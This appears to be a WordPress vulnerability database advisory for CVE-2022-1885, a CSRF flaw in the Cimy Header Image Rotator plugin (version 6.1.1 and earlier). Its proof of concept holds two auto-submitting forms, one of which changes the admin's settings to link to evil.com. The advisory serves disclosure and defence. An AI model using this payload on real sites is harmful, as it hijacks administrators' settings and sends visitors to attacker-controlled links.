WordPress Plugin Vulnerabilities

Cimy Header Image Rotator <= 6.1.1 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=cimy_header_image_rotator#cimy_hir_file_options" method="POST">
    <input type="text" name="filelinks[69wclb.jpg]" value="">
    <input type="text" name="filetext[69wclb.jpg]" value="">
    <input type="text" name="filelinks[69wcmd.jpg]" value="">
    <input type="text" name="filetext[69wcmd.jpg]" value="">
    <input type="text" name="submitButtonName" value="Änderungen speichern">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=cimy_header_image_rotator#cimy_hir_file_options" method="POST">
    <input type="text" name="cimy_hir_post" value="1">
    <input type="text" name="hir_name" value="Main">
    <input type="text" name="hir_images_source" value="plugin">
    <input type="text" name="hir_swap_rate" value="3">
    <input type="text" name="hir_swap_type" value="s">
    <input type="text" name="hir_div_id" value="cimy_div_id_0">
    <input type="text" name="hir_border" value="1">
    <input type="text" name="hir_div_width" value="400">
    <input type="text" name="hir_div_height" value="200">
    <input type="text" name="hir_fade" value="0">
    <input type="text" name="hir_move_effect" value="none">
    <input type="text" name="hir_speed" value="10">
    <input type="text" name="hir_from_topleft_zoom" value="1">
    <input type="text" name="hir_to_bottomright_zoom" value="1.5">
    <input type="text" name="hir_from_bottomright_zoom" value="1">
    <input type="text" name="hir_to_topleft_zoom" value="1.5">
    <input type="text" name="hir_from_topright_zoom" value="1">
    <input type="text" name="hir_to_bottomleft_zoom" value="1.5">
    <input type="text" name="hir_from_bottomleft_zoom" value="1">
    <input type="text" name="hir_to_topright_zoom" value="1.5">
    <input type="text" name="hir_start_from" value="image_zero">
    <input type="text" name="hir_file_link" value="https://evil.com">
    <input type="text" name="hir_link_target" value="_blank">
    <input type="text" name="hir_file_text" value="">
    <input type="text" name="submitButtonName" value="Änderungen speichern">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
cimy-header-image-rotator
No known fix

References

CVE
CVE-2022-1885

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
8416cbcf-086d-42ff-b2a4-f3954c8ff0c8

Timeline

Publicly Published
2022-06-01 (about 1 years ago)
Added
2022-06-01 (about 1 years ago)
Last Updated
2023-03-02 (about 1 years ago)

Other

Published
Title
Published
2024-05-25
Title
Piotnet Addons For Elementor Pro <= 7.1.17 - Cross-Site Request Forgery
Published
2024-01-09
Title
Seraphinite Alternative Slugs Manager < 1.4 - Cross-Site Request Forgery
Published
2023-06-27
Title
Quiz Expert – Easy Quiz Maker, Exam and Test Manager <= 1.5.0 - Cross-Site Request Forgery
Published
2014-08-01
Title
Occasions 1.0.4 - Manipulation CSRF
Published
2023-10-06
Title
Schedule Posts Calendar < 5.3 - CSRF